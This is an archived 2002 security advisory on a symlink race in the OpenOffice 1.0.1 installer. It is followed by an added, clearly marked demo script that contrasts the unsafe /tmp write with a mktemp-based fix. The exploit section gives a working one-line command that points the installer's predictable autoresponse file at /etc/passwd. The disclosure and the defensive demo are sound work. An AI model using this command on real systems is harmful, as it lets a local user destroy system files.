OpenOffice 1.0.1 Race condition during installation.

From: Larry W. Cashdollar (lwcat_private)
Date: Fri Oct 11 2002 - 06:51:22 PDT


    Vapid Labs
    Larry W. Cashdollar
    9/9/02
    
    Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
    system files.
    
    Severity: Low
    
    Description: A very simple and easy to exploit race condition exists during the
     installation of OpenOffice. The install script writes its autoresponse file to
     a predictable, world-writable location, /tmp/${USER}_autoresponse.conf, using a
     plain shell redirection. Any local user who plants a symlink at that name before
     the installer writes to it can have an arbitrary file truncated and overwritten
     with the installer's privileges.
    
    Exploit:
    
    As a normal user, before the installer is run:
    
    lwc $ ln -s /etc/passwd /tmp/root_autoresponse.conf
    
    Here root stands for the login name of the account that will run the installer
    (the script builds the file name from ${USER}); substitute that name if the
    installer is run as someone else. No precise timing is needed: the name is
    predictable, and the link only has to exist before the installer writes to it.
    
    Since the > redirection follows the symlink and truncates its target, this will
    result in the password file being overwritten with the output of this fragment
    of the install script:
    
    # create the proper autoresponse file
    cat << EOF > /tmp/${USER}_autoresponse.conf
    [ENVIRONMENT]
    INSTALLATIONMODE=$installtype
    INSTALLATIONTYPE=STANDARD
    DESTINATIONPATH=$prefix/$oo_home
    OUTERPATH=
    LOGFILE=
    LANGUAGELIST=<LANGUAGE>
    
    [JAVA]
    JavaSupport=preinstalled_or_none
    
    EOF
    
    Fix:
        Create a private working directory under /tmp with restrictive permissions
        and write the autoresponse file inside it. mktemp -d does this correctly:
        the name is unpredictable and the directory is created mode 0700, so no
        other user can plant anything inside it. Until the installer is patched,
        check that /tmp/${USER}_autoresponse.conf does not already exist (as a
        file or a symlink) before starting the installation.
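    The following script is an added example, not code from the advisory or from
    OpenOffice. It reproduces the installer's unsafe write pattern beside a hardened
    version that follows the fix above, and runs both against a throwaway scratch
    directory standing in for /tmp and /etc/passwd, so it is harmless to run. The
    function names, the scratch paths and the shortened autoresponse contents are
    all assumptions made for the demonstration.

```sh
#!/bin/sh
# Added example, not code from the advisory or from OpenOffice: the installer's
# unsafe write pattern beside a hardened one, run in a throwaway scratch
# directory that stands in for /tmp and /etc/passwd so it is harmless.
set -u

SCRATCH=$(mktemp -d)                 # stands in for the whole system
FAKE_TMP="$SCRATCH/tmp"; mkdir "$FAKE_TMP"
VICTIM="$SCRATCH/passwd"             # stands in for /etc/passwd
PASSWD_LINE='root:x:0:0:root:/root:/bin/sh'
printf '%s\n' "$PASSWD_LINE" > "$VICTIM"
USER_NAME=root                       # the installer uses ${USER}

# Unsafe: the pattern quoted from the install script. The shell opens the
# target with O_CREAT|O_TRUNC and follows symlinks, so whatever the link
# points at is truncated and filled with the heredoc body.
write_autoresponse_unsafe() {
    cat << EOF > "$FAKE_TMP/${USER_NAME}_autoresponse.conf"
[ENVIRONMENT]
INSTALLATIONMODE=STANDARD
DESTINATIONPATH=/opt/openoffice
EOF
}

# Pre-flight check to run against the real path
# (/tmp/${USER}_autoresponse.conf) before starting the unpatched installer:
# returns 0 if nothing is there, 1 if a file or symlink was planted.
check_target() {
    if [ -L "$1" ] || [ -e "$1" ]; then
        echo "refusing to write: $1 already exists" >&2
        return 1
    fi
    return 0
}

# Hardened: the advisory's fix. mktemp -d creates an unpredictably named,
# mode 0700 directory, so an attacker can neither guess the name nor place
# anything inside it. Prints the path of the file written.
write_autoresponse_safe() {
    workdir=$(mktemp -d "$FAKE_TMP/ooinstall.XXXXXX") || return 1
    target="$workdir/${USER_NAME}_autoresponse.conf"
    check_target "$target" || return 1
    cat << EOF > "$target"
[ENVIRONMENT]
INSTALLATIONMODE=STANDARD
DESTINATIONPATH=/opt/openoffice
EOF
    echo "$target"
}

# Attacker step: any local user plants the symlink before root installs.
ln -s "$VICTIM" "$FAKE_TMP/${USER_NAME}_autoresponse.conf"

write_autoresponse_unsafe
UNSAFE_RESULT=$(head -n 1 "$VICTIM")   # "[ENVIRONMENT]": passwd clobbered
echo "after unsafe write, passwd starts with: $UNSAFE_RESULT"

# Restore the victim and run the hardened writer against the same setup.
printf '%s\n' "$PASSWD_LINE" > "$VICTIM"
SAFE_FILE=$(write_autoresponse_safe)
SAFE_RESULT=$(head -n 1 "$VICTIM")     # passwd line untouched
echo "after safe write, passwd starts with: $SAFE_RESULT"
echo "autoresponse written to: $SAFE_FILE"
```

    The unsafe writer clobbers the stand-in passwd file even though the attacker
    did nothing but create a link; the hardened writer never touches the
    predictable path, so the planted link is simply ignored. check_target is
    the pre-installation check: run it on /tmp/${USER}_autoresponse.conf and
    refuse to install if it reports anything already there.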
    
    References:
    
    http://www.openoffice.org/dev_docs/source/1.0.1/index.html
    
    Larry W. Cashdollar
    lwcat_private
    http://vapid.ath.cx
    



    This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 09:54:54 PDT